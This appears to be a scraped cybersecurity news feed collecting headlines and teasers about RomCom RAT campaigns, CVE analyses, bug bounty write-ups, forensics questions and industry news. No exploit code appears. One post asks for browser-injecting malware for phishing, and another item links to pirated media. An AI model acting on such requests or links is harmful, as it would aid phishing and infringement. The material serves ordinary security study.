    作者:黑莓研究和情报团队 译者:知道创宇404实验室翻译组 原文链接:https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass 总结 被称为RomCom的黑客正在利用SolarWinds、KeePass和PDF Technologies的品牌力量,开展一系列新的攻击活动。黑莓威胁研究和情报团队在分析...
    CVE-2022-22980 Spring Data MongoDB SpEL 表达式注入漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/8zzXZgSwHAmte5t7KSDhdA 漏洞描述 6月20号,VMware发布安全公告,修复了spring Data MongoDB 组件中的一个SpEL表达式注入漏洞,该漏洞的CVSSv3评分为8.2,漏洞编号:CVE-2022-22980,漏洞威胁等级:高危。 Spring...
  • Open

    黑客使用恶意版本的 KeePass 和 SolarWinds 软件分发 RomCom RAT
    作者:黑莓研究和情报团队 译者:知道创宇404实验室翻译组 原文链接:https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass 总结 被称为RomCom的黑客正在利用SolarWinds、KeePass和PDF Technologies的品牌力量,开展一系列新的攻击活动。黑莓威胁研究和情报团队在分析...
    CVE-2022-22980 Spring Data MongoDB SpEL 表达式注入漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/8zzXZgSwHAmte5t7KSDhdA 漏洞描述 6月20号,VMware发布安全公告,修复了spring Data MongoDB 组件中的一个SpEL表达式注入漏洞,该漏洞的CVSSv3评分为8.2,漏洞编号:CVE-2022-22980,漏洞威胁等级:高危。 Spring...
  • Open

    CVE-2022-33679 Windows Kerberos Elevation of Privilege
    Article URL: https://github.com/Bdenneu/CVE-2022-33679 Comments URL: https://news.ycombinator.com/item?id=33500500 Points: 1 # Comments: 0

  • Open

    Noob question: How can I find out what file was created after someone opened a pdf on autopsy
    Hello everyone, I am looking at an image on autopsy, and someone downloaded a malicious pdf, and I am trying to find out what file was created after a user opened the file. I have looked over autopsy, but I am having trouble finding it. On the context menu it says, "program run on," but when I click that I can't see anything. My other question is, instead of using autopsy is there a Splunk search I can run that would help me find this? submitted by /u/Sgtkeebler [link] [comments]
    Can you find a partition's size in FTK Imager / EnCase?
    Hello, for an assessment in my Cyber Security course, we had to image a partition on a physical hard drive and I was just wondering if it was possible to find the partition's size in either FTK Imager or EnCase? It is an NTFS partition and has been imaged in a .E01 file and it was just the partition that got imaged so no MBR or whatever the NTFS equivalent is (MFT?). I ask this because our partitions were only meant to be 2GB large but in my case I have a suspicion that it was the whole 250GB hard drive. It was definitely the correct partition we needed as it was literally called "IMAGE_ME". Any help appreciated, thanks. submitted by /u/melthamlewis [link] [comments]
  • Open

    $1000 BAC: The Complete Guide to Exploiting Broken Access Control
    TL;DR- What is BAC, how to best exploit it, and how to get the biggest bounties from it. Continue reading on The Gray Area »
    Awesome Bug-Bounty
    A curated list of awesome bug-bounty tools and resources. Continue reading on Medium »
    Caiyon.com (Dall-E Mini) Reflected XSS Vulnerability
    Reflected XSS Bug in Caiyon.com AI Image Generator Continue reading on Medium »
    IDOR on Unsubscribe emails to $200 bounty.
    Recently I got an invitation from a financial website. I registered my account but initially was unable to find anything. Continue reading on Medium »
    403 Forbidden: Access Control Bug Hunting
    TL;DR- An overview of the vulnerability and potential exploit vectors for bug bounty and white-hat hacking purposes. Continue reading on The Gray Area »
    VPS web hacking tools
    Automatically install some web hacking/bug bounty tools for your VPS. Continue reading on Medium »
    6 Free Cyber Security Courses With Certificates
    Hello there, guys! Continue reading on Medium »
    Web Security Academy — Blind OS command injection with time delays
    This lab is part of the Web Security Academy by Portswigger. It is under the category “OS command injection”. This time we have to exploit… Continue reading on Medium »
  • Open

    $1000 BAC: The Complete Guide to Exploiting Broken Access Control
    TL;DR- What is BAC, how to best exploit it, and how to get the biggest bounties from it. Continue reading on The Gray Area »
  • Open

    ThinkstScapes Quarterly | 2022.Q3 | Summary of a lot of conference talks
    submitted by /u/ffyns [link] [comments]
  • Open

    A list of search engines for Marketers/Pen-testers/OSINT Engineers — Part-1
    Your guide for Open Source Intelligence Continue reading on Medium »
    Phishing — What you need to know
    What’s phishing? Continue reading on Medium »
    SPY NEWS: 2022 — Week 44
    Summary of the espionage-related news stories for the Week 44 (30 October-5 November) of 2022. Continue reading on Medium »
  • Open

    TF-CSIRT TRANSITS Workshops
    If you've ever attended any of the Trusted Introducer TRANSITS workshops, I'd love to ask about your opinion on them, if it was worth it, what it was like, if it was more hands-on with exercises, or more lecture-like. Thanks! submitted by /u/FreakySeahorse [link] [comments]
    Ideas for master thesis on Cyber Security - Ethical Hacking?
    Hey all, I need to decide a topic in order to present to my professor for my master thesis. The problem is that I still have no idea what to be focused on, because I have some constraints. Since at the moment I'm an intern consultant for a cybersec company, and I'm doing penetration testing there, I should do the thesis with things related to vulnerability assessment and pentesting. I like cryptography as well and my idea was related to a development of a decentralized CA, but as I said I guess it's not part of the ethical hacking stuff. Any idea/suggestion before I talk with my professor? submitted by /u/electronixxx [link] [comments]
    Local website apparently does not exist???
    So, there is a local school related website that has worked like a charm for the past few months. Suddenly, it started taking 30 to 60 seconds to load. I tried using nslookup, but it just said that the domain was non existant!!! I also tried pinging it in cmd, but it could not find that host. Get requests via python take 60 seconds, but they return 200! Any dns lookup services that I tried cannot find said website, while I can enter said website, just as my friends can too! I don't think it can be a local dns server, because I set mine to google or cloudflare. What could be happening? submitted by /u/Bulky-Technology-398 [link] [comments]
    What is the attack?
    My coworker and I are discussing how to interpret this request. We do not agree. There are around 500 of these POST requests in about 15 min. There are a lot more requests from this up, but this request stands alone for these 15 min. 91.19x.xxx.xxx - - [03/Nov/2022:04:37:54 +01001 "POST /media/j57obix/hen. jpg" 406 5193 “_” "Mozilla/5.0+ (Windows; +U; +Windows+NT+6.0; +en) +AppleWebKit/528.16+(KHTML,+like+Gecko)+Version/4.0+Safari/528.16” submitted by /u/lalatyn [link] [comments]
  • Open

    A lot of Movies, shows, manga, novels and anime
    https://ddl.itonaku.xyz/ submitted by /u/Isolatedleliel [link] [comments]
  • Open

    SecWiki News 2022-11-06 Review
    2022年工业信息安全技能大赛“望岳杯”锦标赛 wp by 路人甲 openwrt 路由器的奇怪 DNS 劫持 by 路人甲 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-06 Review
    2022年工业信息安全技能大赛“望岳杯”锦标赛 wp by 路人甲 openwrt 路由器的奇怪 DNS 劫持 by 路人甲 更多最新文章,请访问SecWiki
  • Open

    Alternative use cases for Systemfunction032
    https://s3cur3th1ssh1t.github.io/SystemFunction032_Shellcode/ submitted by /u/S3cur3Th1sSh1t [link] [comments]
  • Open

    API安全Top 10 漏洞:crAPI漏洞靶场与解题思路
    学习技术最好的方式就是实战,跟着 crAPI 靶场了解 API 常见漏洞,本文将介绍 OWASP API Top 10 常见的漏洞
    FreeBuf早报 | 微软明年继续向乌克兰提供免费云服务;日本加入北约网络防御中心
    据日本时事通讯社当地时间11月4日消息,日本防卫大臣浜田靖一在当日的记者会上表示,日本正式加入北约网络防御中心。
  • Open

    Xổ Số K188☯️
    Có thể bạn chưa biết ⁉️ Đổi đời chỉ sau một đêm tham gia xổ số online, một bộ môn vừa giải tri vừa mang đến nhiều sự may mắn, rinh thưởng… Continue reading on Medium »

  • Open

    Software that can help track cmd commands during session?
    Hey guys, does anyone know what application can help me with tracking cmd commands whenever I install/running applications? the closest thing I've seen so far is any.run but the sandbox is limited to 16mb and I'm working with applications larger than that submitted by /u/myaaa_tan [link] [comments]
    File Handles in Volatility
    Can you access the data inside file handles in Volatility? I'm carrying out a RAM dump to find a generated key stored in a "sSecretKey" variable which is pinned to a memory handle 0x010f13e9 (both variable and handle in screenshot). Can I access this memory handle directly using Volatility, using "handles" or using any other approach? ​ I would also be interest in any solution using yarascan to find this variable value Note: Visual Studio encoding does not appear to be faithful to the actual variable value, it appears to be UTF-8 or some encoding which scrambles our key value effectively with ?'s Key Variable and Memory Handle submitted by /u/Forensics808 [link] [comments]
    Courses?
    Which online courses to buy do you recommend, for Digital Forensics and in particular Mobile Forensics? I have already taken some courses in Italy, I have basic skills. submitted by /u/Zipper_Ita [link] [comments]
    question about global.db of Dropbox
    Hello, I've extraced the global.db of dropbox from an Android device which has a table named shared_links. It has stored file paths which lead to a local folder which has the name of the image/Video and in the folder there are thumbnails of the video or picture as far as i understand. Does anyone know at what conditions these paths are created? Maybe when i create a link of my pictures and videos and share it? Also there are other tables, maybe more of them are forensically relevant? I couldn't find any information about the database. Thank you very much submitted by /u/JustARandomDude54 [link] [comments]
  • Open

    I found a huge company with *horrendous* password procedures. Is there anyone to report this to?
    As I was signing up for an account on this company's website, I noticed the following: Answers to security questions are stored in plaintext The maximum character limit for passwords is 10 Only alphanumeric characters are accepted Easily predictable name-based usernames are assigned to each user and are unchangeable It's hard to overstate how big this company is within its field. Practically a monopoly. It's a more hidden part of the website, which is why I think it probably hasn't been updated in over a decade, but pretty much everyone who uses the site will have to create an account there at some point. They seemingly have no dedicated webmaster or security person to contact. I will email their support, but I highly doubt this will lead them to redo their entire system. I know this isn't technically a security vulnerability, but it is pretty much the definition of a best practices violation. Is there any sort of organization or agency I should contact about this? And how much time should I give them before I disclose this to the public? There are a huge amount of people using this system with no idea their security is at risk. Oh, and does the fact that there is a maximum password limit imply that they are storing the passwords in plaintext too? I looked it up and saw some people point out that properly stored passwords would probably be the same length in the database if they were hashed and salted. submitted by /u/yrdz [link] [comments]
    Don't want to be pentester anymore
    I worked as a pentester for the last 6 years or so. Mostly in area of web apps, mobile apps, thich clients, external/internal networks. I don't want to do it anymore. If I would like to transition, in what areas of security do you think typical pentesting skills or knowledge is useful? I imagine that threat hunting sounds reasonable, but maybe you have some other ideas? submitted by /u/f00000d [link] [comments]
  • Open

    Directory traversal in PDF viewing application. Leading to full database takeover
    Hello everyone, this is my first write-up here and i hope you enjoy. Continue reading on Medium »
    Exploit Feature To Get High Bug impact
    how I Exploit Website Feature To Get High Bug impact Continue reading on Medium »
    Bug Zero at a Glance [Week 29 October — 4 November]
    This week was an exceptional week for Bug Zero! Continue reading on Bug Zero »
    Story of a $1k bounty — SSRF to leaking access token and other sensitive information
    Hello and welcome everyone to my story of how I got my first bounty on HackerOne by exploiting an SSRF that leaked Google cloud access… Continue reading on InfoSec Write-ups »
    ApeCoin DAO Consent to $4.4M For Bug Bounty Scheme on ImmuneFi
    Continue reading on Medium »
    PENTEST TALES: EXIF Data Manipulation
    Delivering XSS via unconventional means Continue reading on Medium »
  • Open

    Huge Collection of Digital TTRPG Tokens
    submitted by /u/Glad-Line [link] [comments]
  • Open

    SOCK PUPPET
    A sock Puppet Account also can be referred to as a burner account. These accounts are used and are not associated with us in any way. This… Continue reading on Medium »
    Analyzing Telegram chats and channels. Regular expressions in OSINT in practice
    Reading other people’s conversations in public Telegram chats can sometimes be very boring and tedious. Continue reading on Medium »
  • Open

    SecWiki News 2022-11-05 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-05 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    CVE-2022-35252: control code in cookie denial of service
    Internet Bug Bounty disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1686935 - Bounty: $480
  • Open

    WordPress Vulnerabilities & Patch
    submitted by /u/seyyid_ [link] [comments]
  • Open

    中央网信办印发《关于切实加强网络暴力治理的通知》
    网络暴力针对个人集中发布侮辱谩骂、造谣诽谤、侵犯隐私等违法信息及其他不友善信息,侵害他人合法权益,扰乱正常网络秩序。
    马斯克血洗Twitter,网络安全部门集体被裁
    因对Twitter安全和内容审核不满,马斯克裁撤Twitter整个安全部门。
  • Open

    HRDevHelper - Decompiler Plugin for Hex-Rays by Dennis Elser
    submitted by /u/Gallus [link] [comments]
    AWS Organizations Defaults - Hacking The Cloud
    submitted by /u/RedTermSession [link] [comments]

  • Open

    I'm a student and I'm stuck on a Windows image, not sure where else to turn
    I hope you don't mind beginner-level questions! I'm in a digital forensics class and we've been given an image to analyze (Windows, I think 2000 but I'm not in front of the assignment right now). I found EFS-encrypted files, and I've found hints in the image's chat/email logs that instruct us on how to use the System and SAM registry hives to crack the password and decrypt the files. Unfortunately, the demo programs (FTK Imager Lite and Password Recovery Toolkit) don't have the features hinted at in the assignment and I can't find free programs to use instead. Is there a good (and free, that bit's important) replacement tool I can use to extract the hashes from the SAM hive, crack them, and then decrypt the EFS files in an image? I've seen lots of easy ways to do it in a mounted drive, but this image has been hacked to bits to make it easy for a student to analyze and I doubt it can be mounted anymore. submitted by /u/tacticalfashion [link] [comments]
    malware or rootkit that inject html in the browser..
    Hello, anyone know a malware or rootkit that inject html in the browser ? It should inject html in the victim browser to make a sort of phishing on specific website. Or something that exfiltrate https encryption key. In this way the attacker having hacked the router and having the encryptions key it could make mitm attack for phishing or just spying the user with a very low fingerprint. EDIT: somthing like snakso but it should inject html code in the browser. In the case of snakso it inject html code in the webserver. Other snakso analysis submitted by /u/SkyTeeth [link] [comments]
    Intella for Investigations
    I've used a wide variety of forensic tools throughout the years (e.g. FTK, Nuix, EnCase, Axiom), and have come across Intella. I really like some of the capabilities when handling email in particular. A colleague of mine recently advised that he had heard (in the eDiscovery space) that there were some complaints of Intella "missing things". He couldn't provide details or specifics, and so I thought I'd reach out to the greater good to get thoughts on Intella as a processing tool. I know Intella can become fairly convoluted (with the bubbles in particular), but I've found that if you actually understand how the tool works, the tool is very effective. I've validated the tool with sample sets of data, but I think we all know that data comes in "all shapes and sizes". I'm just curious if there are some out there that have actually experienced issues with the processing and searching using this tool (actually missing data), or what their experience has been so far. submitted by /u/W1nterRanger [link] [comments]
    Forensics@NIST 2022, Nov. 8-10 : free virtual conference
    Free, virtual conference which includes a digital forensics track. Details and registration at https://www.nist.gov/news-events/events/2022/11/forensicsnist-2022 submitted by /u/dwhite21787 [link] [comments]
  • Open

    OverTheWire type resources to learn Google hacking
    I loved OverTheWire WarGames to learn Linux. I am wondering if there are any similar idea/site to learn google hacking? submitted by /u/palm_snow [link] [comments]
    Which Government/Country has the best Network Security/ Information security?
    In this question I'm not talking about oh so and so government has this incredible encryption that required five peoples eyebrow hair to unlock type thing. I am more talking about the day to day stuff that doesn't make headlines but is just quietly acknowledged as actually quite good. For a practical example the UK has a lot of fancy sounding achievements for their cybersecurity and likes to boast about how seriously they take it... but then in practice ministers are using WhatsApp to talk about important information and the NHS as well as other government sectors have regularly been crippled by cyber attacks. What government do you think actually takes their Network Security seriously and actually implements it effectively? Or if you can't think of one then just one where you've heard what its like and think "Oh that's actually quite good" submitted by /u/DeerInTheHerbGarden [link] [comments]
    Is there a way to find out where a gps tracker sends data to?
    A friend of mine recently found a GPS tracker in his car. Is there a way to find out where its sending the data? It has a SIM card in it, so I assume its sending the location via mobile internet. submitted by /u/kappadoky [link] [comments]
    What are some modern web security books?
    The two best books I am aware of for web security are the "The Tangled Web" and "The Web Application Hackers Handbook" and while these are both fantastic books, they were both released in 2011, and while the majority of the content still applies, there have been many changes to both server and browser security mechanisms over the last decade which are not present. Do you know of any other great modern web security books I can add to my collection? Thanks! submitted by /u/pentesticals [link] [comments]
    Creating an automated vulnerability alerting system from different sources.
    Hello, I want to find a way to automate alerting for newly found vulnerabilities. We have scanners that will scan, but I want to implement another solution that will notify us every week from different sources like mitre, nvd, opencve, cisa.gov, etc. searching with keywords for example: Ubuntu, windows 10, java, or some frameworks and libraries and their version. How are big companies doing it or can you recommend how to approach the project? I'm confused, should I write a script or something or just use PowerAutomate with an dedicated email account. Is there any preferred method or tools to do it with. How should I download the resources - RSS feed, API calls, XML-s, JSON? Thanks! ​ Edit: Fixed flair. submitted by /u/tryingtoworkatm [link] [comments]
    is there a way to find who's spamming website contactme??
    Recently a friend has been getting disgusting messages through the contact me page on her website. Personal attacks, wishing death upon children, telling her to kill herself. All kinds of stuff. After going to the police and it still continuing is there a way to somehow find out who's doing it when they keep making new fake email addresses?? Any advice would be greatly appreciated as she is getting pretty shaken up about it submitted by /u/handsupcacto [link] [comments]
  • Open

    CSS Injection via Client Side Path Traversal + Open Redirect leads to personal data exfiltration on Acronis Cloud
    Acronis disclosed a bug submitted by mr-medi: https://hackerone.com/reports/1245165 - Bounty: $250
    DOS via issue preview
    GitLab disclosed a bug submitted by legit-security: https://hackerone.com/reports/1543718 - Bounty: $7640
    Path paths and file disclosure vulnerabilities at influxdb.quality.gitlab.net
    GitLab disclosed a bug submitted by otoyyy: https://hackerone.com/reports/1643962 - Bounty: $100
    DOS via move_issue
    GitLab disclosed a bug submitted by legit-security: https://hackerone.com/reports/1543584 - Bounty: $2300
    RepositoryPipeline allows importing of local git repos
    GitLab disclosed a bug submitted by vakzz: https://hackerone.com/reports/1685822 - Bounty: $22300
  • Open

    WGET doesn't work on Windows 11
    Hi, I hope this post is allowed but this certainly seems like the right community to ask. I just built a new computer running Windows 11 and now it appears that WGET fails. I get a "Wget is not recognized as an internal or external command." Is there a workaround to this? submitted by /u/Notorious888 [link] [comments]
  • Open

    HTML INJECTION LEADS TO OPEN REDIRECT
    Hiii hacker scriptkiddie is back! So few days ago, I was hunting on the VPN programe. Let’s consider xyz.com, where I found HTML injection… Continue reading on Medium »
    Credentials Dumping :Red Teaming
    When an attacker has an access to the target system then there are multiple methods to retrieve the credentials stored in that target. So… Continue reading on Medium »
    CSRF Leads to Delete User Account
    Hey there, this is my first write-up so don’t expect it to be “professional” or something like this :”D Continue reading on Medium »
    Web Enumeration -WPScan
    WPScan which is also an automated tool for web enumeration… Continue reading on Medium »
    The Ultimate Bug Bounty Checklist For 2FA
    TL;DR- A 13 point checklist of possible bugs to run through in hacking 2FA or MFA on websites, and how to exploit them. Continue reading on The Gray Area »
    BUG BOUNTY: FIND HIDDEN PARAMETERS
    Hey everyone! I hope you all are doing good and hunting bugs. In this article, we are going to learn how to find hidden parameters in web… Continue reading on Medium »
    Cyber Laws In Pakistan!
    Hey, guys! Continue reading on Medium »
    Team Finance Exploited for $14.5M, Attacker Keeps 10% as a Bug Bounty.
    On October 27th, DeFi project Team Finance announced that they had just been alerted about an exploit on its protocol. They said they were… Continue reading on OMNIA Protocol »
  • Open

    SecWiki News 2022-11-04 Review
    使用电信 TR069 内网架设 WireGuard 隧道异地组网 by ourren Prowler: AWS security best practices 基线检查 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-04 Review
    使用电信 TR069 内网架设 WireGuard 隧道异地组网 by ourren Prowler: AWS security best practices 基线检查 by ourren 更多最新文章,请访问SecWiki
  • Open

    Python Source Code Analysis
    No content preview
    Automation of Buffer-Overflow
    No content preview
    4 Videos From 4 Infosec Experts to Explain Web3 Hacking
    No content preview
  • Open

    Python Source Code Analysis
    No content preview
    Automation of Buffer-Overflow
    No content preview
    4 Videos From 4 Infosec Experts to Explain Web3 Hacking
    No content preview
  • Open

    Python Source Code Analysis
    No content preview
    Automation of Buffer-Overflow
    No content preview
    4 Videos From 4 Infosec Experts to Explain Web3 Hacking
    No content preview
  • Open

    The Android Malware's Journey: From Google Play to banking fraud | Cleafy Labs
    submitted by /u/f3d_0x0 [link] [comments]
    Reverse Branch Target Buffer Poisoning - new ASLR bypass technique using CPU vulnerabilities [PDF]
    submitted by /u/Gallus [link] [comments]
    MI-X - Determine whether your compute is truly vulnerable to a specific vulnerability
    submitted by /u/boutnaru [link] [comments]
    CVE-2022-33679 Windows Kerberos Elevation of Privilege
    submitted by /u/smokiesmk [link] [comments]
  • Open

    ATT&CK—Caldera 实操(保姆级教学)
    使用caldera复现了windows worm #1链,记录安装过程及踩得坑
    FreeBuf周报 | 美国陆军首次装备赛博态势理解软件;台湾 2300 万人民信息泄露
    各位 Buffer 周末好,以下是本周「FreeBuf周报」,我们总结推荐了本周的热点资讯、安全事件、一周好文和省心工具,保证大家不错过本周的每一个重点!
    德国跨国汽车巨头大陆集团遭LockBit勒索软件组织攻击
    LockBit要求在11月4日15:45:36(北京时间23:45:36)之前收到赎金。
    你引用的开源代码,可能夹带了漏洞
    软件供应链漏洞分析技术前瞻~
    非洲数十个金融组织遭黑客攻击,损失巨大
    OPA1ER组织近年来针对非洲、亚洲和拉丁美洲的银行、金融服务和电信公司发起30多次成功的网络攻击。
    文旅部出台新规:严禁酒店大数据杀熟,不许违规收集信息
    随着平台用户数量不断增多,在给大众旅行带来便利的同时,许多问题日渐浮现,其中最为知名的便是大数据“杀熟”。
  • Open

    Immunity Debugger crash on M1 Mac
    Hello everyone. I am using a macbook pro 16 with m1 pro and have set up a VM via UTM to emulate Windows XP and Windows 7. These x86 and x64 machines work quite well and I need them to study Windows exploit development. For this reason I have installed within these machines Immunity Debugger, but when I try to debug an application (such as Vulnserver), the Debugger crashes the VM. Do you have any suggestions, has anyone experienced the same thing? submitted by /u/onikage04 [link] [comments]
  • Open

    From Fuzzing to Proof: Using Kani with the Bolero Property-Testing Framework
    Article URL: https://model-checking.github.io//kani-verifier-blog/2022/10/27/using-kani-with-the-bolero-property-testing-framework.html Comments URL: https://news.ycombinator.com/item?id=33463600 Points: 1 # Comments: 0
  • Open

    在 Android 中开发 eBPF 程序学习总结(一)
    作者:Hcamael@知道创宇404实验室 日期:2022年11月4日 最近在研究eBPF,做一下学习笔记。 起因 其实是想学习一下ecapture是怎么实现的,但是实际在我xiaomi 10手机上测试的过程中(已经有root权限)发现,并没办法运行,因为ecapture需要内核开启CONFIG_DEBUG_INFO_BTF,这个配置信息可以通过/proc/config.gz中来查看是否开启...
  • Open

    在 Android 中开发 eBPF 程序学习总结(一)
    作者:Hcamael@知道创宇404实验室 日期:2022年11月4日 最近在研究eBPF,做一下学习笔记。 起因 其实是想学习一下ecapture是怎么实现的,但是实际在我xiaomi 10手机上测试的过程中(已经有root权限)发现,并没办法运行,因为ecapture需要内核开启CONFIG_DEBUG_INFO_BTF,这个配置信息可以通过/proc/config.gz中来查看是否开启...

  • Open

    PYTHON SSTI的一些BYPASS
    对pyssti的一些整理。
    谈谈域渗透中常见的可滥用权限及其应用场景
    本文主要谈了几种域中容易被滥用的权限及其应用场景,并进行了实际的演示。
    如何保护企业核心代码 | FreeBuf甲方群话题讨论
    数据安全成为行业热门,对于代码的保护,尤其是核心代码仿佛没有过多提及,是否代码的敏感性、重要程度已不如数据?该如何确保核心代码安全?
    FreeBuf早报 | 美国陆军首次装备赛博态势理解软件;黑客入侵乌军战场指挥系统
    报告显示,美国金融机构2021年上报勒索攻击事件1489起,远高于2020年的487起。
    记一次详细的实战渗透
    一次授权的渗透测试,过程比较详细,充满了巧合,也算比较有意思,直接记录一下。整体来说难度不大,没有域,难点在免杀,能拿报表系统是巧合,转发上线没意外,似乎内网环境比较大。
    利用JdbcRowSetImpl链对Fastjson1.2.23Jndi注入
    Fastjson是一个Java语言编写的高性能功能完善的JSON库。它采用一种“假定有序快速匹配”的算法,把JSON Parse的性能提升到极致,是目前Java语言中最快的JSON库。
    VR、快闪、脑力大挑战、露营… …CIS 2022网络安全创新大会多种玩法公布!
    CIS 大会除了以丰富的干货著称,新颖的互动玩法也是一大特色。
    警方立案调查,河南女老师或因“网课爆破”猝死,网暴该停了
    新冠疫情持续影响之下,网课、线上会议成为人们上学、工作的新选择。但怎么也没有想到,会有老师因为所谓的“网课爆破”而丧命,令人无比心痛!
    钱不要了!32% 的 CISO 考虑离职
    英美两国32% 的CISO或其它IT安全DM正在考虑辞职。
    CVE的别样发现之旅 | AOSP Bug Hunting with appshark (1): Intent Redirection
    被扫描出来的2个CVE
    数百家美国新闻网站竟推送恶意软件
    全美数百家报纸的网站上被部署SocGholish JavaScript恶意软件框架。
    静态链接符号重定位 | GCC | PWN基础
    静态链接器以一组可重定位目标文件和命令行参数作为输入,生成一个完全链接的、可以加载和运行的可执行目标文件作为输出
    vulntarge-h
    前言:hackmyvm打靶系列文章。本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!所有环境均为在线下载的靶场,且在本机进行学习。考察点这个靶场非常有意思,结合隧道、免杀等知识
    物联网终端安全入门与实践之玩转物联网固件(下)DIY篇
    本篇将着重介绍终端设备固件常见的DIY方法,最后通过对ASUS AC68U路由器进行固件修改带领读者走进固件DIY的世界。
  • Open

    Release Ghidra 10.2 · NationalSecurityAgency/ghidra
    submitted by /u/mumbel [link] [comments]
    Why Did the OpenSSL Punycode Vulnerability Happen
    submitted by /u/ScottContini [link] [comments]
    Threat Model Examples
    submitted by /u/hipver [link] [comments]
    The below-OS for supply chain of critical infrastructure protection
    submitted by /u/hardenedvault [link] [comments]
    CVE-2022-3602 & CVE-2022-3786 - OSS tools to detect susceptibility to the recent OpenSSL issues
    submitted by /u/SRMish3 [link] [comments]
  • Open

    Google Dorking — Everything You Need To Know
    You say you want to be a hacker but you still use Google like you are 100 years old. Let us fix that! Continue reading on Medium »
    Visualisasi dan Analisis Data untuk Investigasi Kejahatan Siber
    Table of Contents Continue reading on Medium »
    Introducing the Open Source Analysis Tree (OSAT)
    The Open Source Analysis Tree (OSAT) is a simple flowchart which has been designed to be utilised as part of the collection stage of the… Continue reading on Medium »
  • Open

    what's the main tool in your shop?
    Does anyone still like (or tolerate) FTK or Encase? My lab uses Axiom Cyber and I convinced them to switch from FTK to Xways starting next year. Curious where everyone else is at or looking to move to. submitted by /u/Inevitable_Logging [link] [comments]
    Collecting iMessages from cloud
    We have been using Magnet Acquire to collect messages that have been backed up to a users icloud account. We then log in to an iPhone as that user and collect that phone. This is used in cases where the user has to maintain usability and “just needs to keep their phone”. Sorry to those who already understand this. This has been a tested & consistently trusted method. However with the most recent update, our testing is showing that even with complete backup there is now data loss. We are only getting about 2gb of messages (one had over 28gb on the phone). Are you guys seeing the same? Do you have a work around and do you understand why this is happening? submitted by /u/Original-Face-9933 [link] [comments]
    Camera solution for evidence
    Hello guys, as we are getting more and more evidence we are searching for a camera solution to take pictures of them. It may be a camera which is fixed on the desk so we don’t have to change the angle. For bigger evidence like All-in-One-Computers we could use our normal camera. It's mainly for smaller evidence like smartphones, flash drives... Any recommendations for that? Network support would also be great so that the taken pictures were uploaded to our storage. Thank you in advance and BR submitted by /u/illegaldolly [link] [comments]
  • Open

    OS Banner Grabbing & Identifying Target System OS.
    Banner grabbing is a technique used by hackers and security teams to gain information about computer systems on networks and services… Continue reading on Medium »
    Invitation Hijacking
    Hi Guys! Long time no see! Continue reading on Medium »
    Login CSRF — What is it and how to prevent it?
    Login CSRF (Login Cross-Site Request Forgery) is a type of attack where an attacker forces a user to login to the attacker’s account. A… Continue reading on Medium »
    How I made a reliable hacking tools and resources search engine in two days (~6500 entries!)
    https://lobuhi.github.io/ Continue reading on Medium »
    Get Blind XSS within 5 Minutes — $100
    Hello Boss…. Continue reading on InfoSec Write-ups »
    TGA Weekly Newsletter [11/2/22] — U.S. State Department Hack
    Hey! Welcome to The Gray Area’s weekly newsletter, with the top posts of the week. Today, I’ll be reviewing top posts and a hack on the… Continue reading on The Gray Area »
  • Open

    Get Blind XSS within 5 Minutes — $100
    No content preview
    OSCP — Cracking The New Pattern
    No content preview
    pentesting.cloud part 1: “Open To The Public” CTF walkthrough
    No content preview
    Write-up: Information disclosure in error messages @ PortSwigger Academy
    No content preview
    Fun with TurboIntruder,
    or, how to get ffuf with a gui while also doing some py coding Continue reading on InfoSec Write-ups »
    The easiest bug to get a Hall of fame from a Billion dollar company.
    No content preview
    The Complete Guide to PortSwigger Directory Traversal and How to Prevent It
    No content preview
    Guess Your Enemies’ Passwords With Python (Brute Force Attack)
    No content preview
  • Open

    Get Blind XSS within 5 Minutes — $100
    No content preview
    OSCP — Cracking The New Pattern
    No content preview
    pentesting.cloud part 1: “Open To The Public” CTF walkthrough
    No content preview
    Write-up: Information disclosure in error messages @ PortSwigger Academy
    No content preview
    Fun with TurboIntruder,
    or, how to get ffuf with a gui while also doing some py coding Continue reading on InfoSec Write-ups »
    The easiest bug to get a Hall of fame from a Billion dollar company.
    No content preview
    The Complete Guide to PortSwigger Directory Traversal and How to Prevent It
    No content preview
    Guess Your Enemies’ Passwords With Python (Brute Force Attack)
    No content preview
  • Open

    Get Blind XSS within 5 Minutes — $100
    No content preview
    OSCP — Cracking The New Pattern
    No content preview
    pentesting.cloud part 1: “Open To The Public” CTF walkthrough
    No content preview
    Write-up: Information disclosure in error messages @ PortSwigger Academy
    No content preview
    Fun with TurboIntruder,
    or, how to get ffuf with a gui while also doing some py coding Continue reading on InfoSec Write-ups »
    The easiest bug to get a Hall of fame from a Billion dollar company.
    No content preview
    The Complete Guide to PortSwigger Directory Traversal and How to Prevent It
    No content preview
    Guess Your Enemies’ Passwords With Python (Brute Force Attack)
    No content preview
  • Open

    Stopping C2 communications in human-operated ransomware through network protection
    submitted by /u/SCI_Rusher [link] [comments]
    Cybersecurity expert analysis about security vulnerabilities that alters exposed NGINX config files
    submitted by /u/cheeztoshobo [link] [comments]
    On Bypassing eBPF Security Monitoring
    submitted by /u/default_user_acct [link] [comments]
  • Open

    Password management system able to share subsets of passwords to different devices
    I use a password manager (Bitwarden), but it has a single master password which gives read-write access to ALL of my passwords at once. At times I need to read a small subset of my passwords on some device which I don't fully trust. Things like: I made a bunch of "media boxes" (Raspberry Pis with the appropriate software) with access to a number of services which require authentication via password (like Netflix, Spotify etc). Besides the one I use, I gave one to my parents, one to my brother, one to my partner and so on. I have access to some computers I don't manage (like the university's) and need to access a number of services from there. I have a couple of gaming devices (a desktop computer and a steam deck) where my nephews often play. They use a number of services with passwor…
    How to collect vendor advisories to MISP
    I have been given an threat intel off task which is not really my expertise to collect security advisories pages such as Cisco and not so popular ones such as these startup vendor security. How does one go about this? Do I need to manually make a python crawler with beautifulsoup to scrape this data periodically and push it into MISP API or is there an official way to go about this? submitted by /u/VertigoRoll [link] [comments]
    Is there any InfoSec job I won’t hate?
